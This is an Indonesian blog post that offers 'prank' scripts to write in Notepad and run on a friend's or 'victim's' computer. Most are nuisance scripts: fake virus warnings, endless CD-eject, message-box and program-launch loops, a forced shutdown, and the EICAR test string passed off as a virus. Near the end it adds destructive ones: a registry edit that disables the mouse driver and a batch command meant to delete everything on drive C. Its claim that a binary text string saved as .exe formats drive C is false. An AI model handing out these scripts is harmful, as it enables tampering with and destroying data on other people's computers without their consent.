10 Trik Jail Untuk Ngerjain Teman Menggunakan Notepad


    10 Trik Jail Untuk Ngerjain Teman Menggunakan Notepad
    Notepad adalah sebuah program editor text yang ada di sistem operasi windows , Dinotepad kamu bisa mengedit semua tulisan dari berbagai macam bahasa pemrograman, Ternyata selain untuk mengedit text notepad bisa kita gunakan untuk mengerjain teman. Ada 10 Trik yang sayang jika tidak kamu cobain di notepad.

    Bagaimana cara menjalankan Notepad di windows?

    Cara membuka notepad di windows silahkan ikuti langkah nya dibawah ini:

    Cara pertama untuk membuka notepad

    #1. Klik Logo Windows atau Start.
    #2. Silahkan ketikan "notepad" pada kolom pencarian.
    cara membuka notepad di windows 7
    #3. Lihat dibagian atas buka dengan klik enter notepadnya.
    #4. Selesai.

    Cara kedua membuka notepad di windows

    #1. Klik Tombol WIN (Logo Windows) + R secara bersamaan.
    membuka notepad
    #2. Ketika muncul kotak dialog isikan dengan "notepad" dan Enter.
    #3. Selesai.

    Oke semoga tidak ada kendala dalam langkah membuka notepad sekarang mari kita lihat beberapa trik yang bisa dilakukan di notepad.

    10 Trik jail di notepad untuk mengerjai teman.

    Saya anggap sobat carahackwifi.net sudah membuka notepadnya masing masing.

    #1. Membuat tulisan slow motion di Windows.

    Silahkan kamu masukan script dibawah ini untuk membuat tulisan bergerak lambat di windows teman kamu.

    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject(“WScript.Shell”)
    WshShell.Run “notepad”
    WScript.Sleep 100
    WshShell.AppActivate “Notepad”
    WScript.Sleep 500
    WshShell.SendKeys “Hel”
    WScript.Sleep 500
    WshShell.SendKeys “lo ”
    WScript.Sleep 500
    WshShell.SendKeys “, ho”
    WScript.Sleep 500
    WshShell.SendKeys “w a”
    WScript.Sleep 500
    WshShell.SendKeys “re ”
    WScript.Sleep 500
    WshShell.SendKeys “you”
    WScript.Sleep 500
    WshShell.SendKeys “? ”
    WScript.Sleep 500
    WshShell.SendKeys “I a”
    WScript.Sleep 500
    WshShell.SendKeys “m g”
    WScript.Sleep 500
    WshShell.SendKeys “ood”
    WScript.Sleep 500
    WshShell.SendKeys ” th”
    WScript.Sleep 500
    WshShell.SendKeys “ank”
    WScript.Sleep 500
    WshShell.SendKeys “s! “

    Simpan notepad tersebut dengan klik tombol "Ctrl + S" dengan Format (.vbs) lihat gambar dibawah ini.
    Membuat tulisan bergerak lambat di notepad

    #2. Trik Membuat Tipuan Windows Error atau Rusak.

    trik ini bakalan buat jantung teman kamu berdetak kencang, Apalagi kalau teman kamu emang awam banget dengan komputer pasti dia akan bingung banget.
    Silahkan tulisakan script berikut ini di notepad kamu dan simpan dengan format (.vbs)

    Type X=Msgbox(“Windows Terinfeksi Virus Mematikan”,0+16,”Notifikasi Error Windows”)
    Membuat Peringatan Windows Error di Notepad

    #3. Trik membuat CDroom terbuka otomatis secara berulang ulang.

    Kalau trik yang satu ini pasti akan bikin teman kamu kewalahan untuk menutup CDroom pada laptop atau komputer mereka, Apalagi kalau kamu jailin nya tengah malah pasti akan buat teman kamu ketakutan.
    Berikut script nya pastekan di notepad dan simpan.

    Set oWMP = CreateObject(“WMPlayer.OCX.7″)
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count – 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
    Membuat CD Room terbuka secara berulang ulang di windows menggunakan notepad
    Simpan Notepad tersebut dalam bentuk .vbs

    #4. Trik membuat lampu keyboard komputer kedip kedip.

    Silahkan pastekan kode berikut di notepad dan simpan file dalam format .vbs
    Set wshShell =wscript.CreateObject

    (“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “{CAPSLOCK}”
    wshshell.sendkeys “{NUMLOCK}”
    wshshell.sendkeys “{SCROLLLOCK}”
    loop

    Membuat lampu keyboard berkedip kedip di notepad

    #5. Membuat virus sederhana di Notepad

    Biasanya ini akan terdeteksi sebagai Virus pada komputer yang menggunakan antivirus tapi tenang ini hanya virus biasa yang tidak akan menyebabkan kerusakan pada komputer korban.
    Silhakan pastekan kode berikut dan simpan dalam format .exe

    X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

    Cara membuat virus sederhana menggunakan notepad

    #6. Membuat Efek seperti di Film Matrix Pada CMD

    Keren neh sayang banget kalau nggak kamu cobain langsung aja deh pastein kodenya di notepad dan simpan dalam format .bat

    @echo off
    color 02
    :start
    echo %random% %random% %random% 
    %random% %random% %random% %random% 
    %random% %random% %random%
    goto start
    Membuat Efek seperti matrix di windows

    #7. Membuat Chat Palsu di Windows

    Pada script ini kita akan membuat program yang bertanya secara terus menerus pada komputer korban, Silahkan pastekan kode dibawah ini dan simpan dalam format .bat

    @ECHO off
    :Begin
    msg * Hi
    msg * Are you having fun?
    msg * I am!
    msg * Lets have fun together!
    msg * Because you have been o-w-n-e-d
    GOTO BEGIN

    Membuat chat palsu di windows menggunakan notepad

    #8. Membuat Password Pada Folder di Windows menggunakan Notepad

    Silahkan langsung di kopi saja script berikut ini dan simpan dalam format .bat

    @ECHO OFF
    title Folder Private
    if EXIST “Control Panel.{21EC2020-

    3AEA-1069-A2DD-08002B30309D}” goto 

    UNLOCK
    if NOT EXIST Private goto MDLOCKER
    :CONFIRM
    echo Are you sure you want to lock the 

    folder(Y/N)
    set/p “cho=>”
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Private “Control Panel.{21EC2020-

    3AEA-1069-A2DD-08002B30309D}”
    attrib +h +s “Control Panel.{21EC2020-

    3AEA-1069-A2DD-08002B30309D}”
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to unlock the 

    folder
    set/p “pass=>”
    if NOT %pass%== carahackwifi.net goto FAIL
    attrib -h -s “Control Panel.{21EC2020-

    3AEA-1069-A2DD-08002B30309D}”
    ren “Control Panel.{21EC2020-3AEA-1069

    -A2DD-08002B30309D}” Private
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDLOCKER
    md Private
    echo Private created successfully
    goto End
    :End

    Membuat Password Folder tanpa Aplikasi menggunakan notepad di windows
    Keterangan Silahkan rubah password dengan mengganti carahackwifi.net pada script.


    #9. Membuka Program Notepad secara terus menerus.

    Script ini tidak hanya bisa untuk membuka notepad namun bisa juga kamu gunakan untuk membuka berbagai program yang ada di komputer korban. Silahkan pastekan script berikut dan simpan dalam format .vbs

    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top

    Membuka suatu program menggunakan notepad

    #10. Mematikan komputer secara otomatis menggunakan Notepad

    Pastekan script berikut dan simpan dalam format .bat

    @echo offShutdown.exe -s -t 10clsmsg * Shutdown dulu ya komputernya!

    Mematikan komputer secara otomatis menggunakan Notepad
    Bosnus :

    Merubah text menjadi suara menggunakan notepad

    Silahkan paste script dibawah ini dan simpan dalam format .vbs

    Dim message, sapi message=InputBox
    (“Ini adalah trik notepad dari carahackwifi.net”,”Hover pc Hacks 
    Text-To-Audio Converter”) Set 
    sapi=CreateObject(“sapi.spvoice”) 
    sapi.Speak message

    Merubah text menjadi suara di notepad
    Membuat Mouse tidak bisa di gerakan menggunakan notepad
    Paste script di notepad dan simpan dalam format .bat
    rem Disable Mouseset

    key=”HKEY_LOCAL_MACHINE\system
    \CurrentControlSet\Services
    \Mouclass”reg delete %key%reg add %key% 
    /v Start /t REG_DWORD /d 4


    Membuat virus penghapus Drive C menggunakan Notepad

    Ini sangat tidak disarankan, Karena dapat menghapus semua isi dari Drive C di komputer korban kamu.

    @Echo offDel C:\ *.* |y

    Simpan script tersebut dalam format .bat

    Format habis Drive C di komputer menggunakan Notepad

    Ini juga tidak saya sarankan untuk digunakan jailin teman kasihan kan kalau drive c nya abis.

    01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

    Simpan script dalam format .exe

    Jika kamu tidak mau repot repot ngetik script atau kode jail di notepad pada tutorial diatas kamu bisa Download semua trik jail notepad di atas disini.

    Terimakasih semoga dapat menjadi pelajaran bagi kita semua, Ingat kami carahackwifi.net tidak bertanggung jawab atas apa saja yang terjadi jika kamu menerapkan trik ini pada teman atau orang terdekat kamu.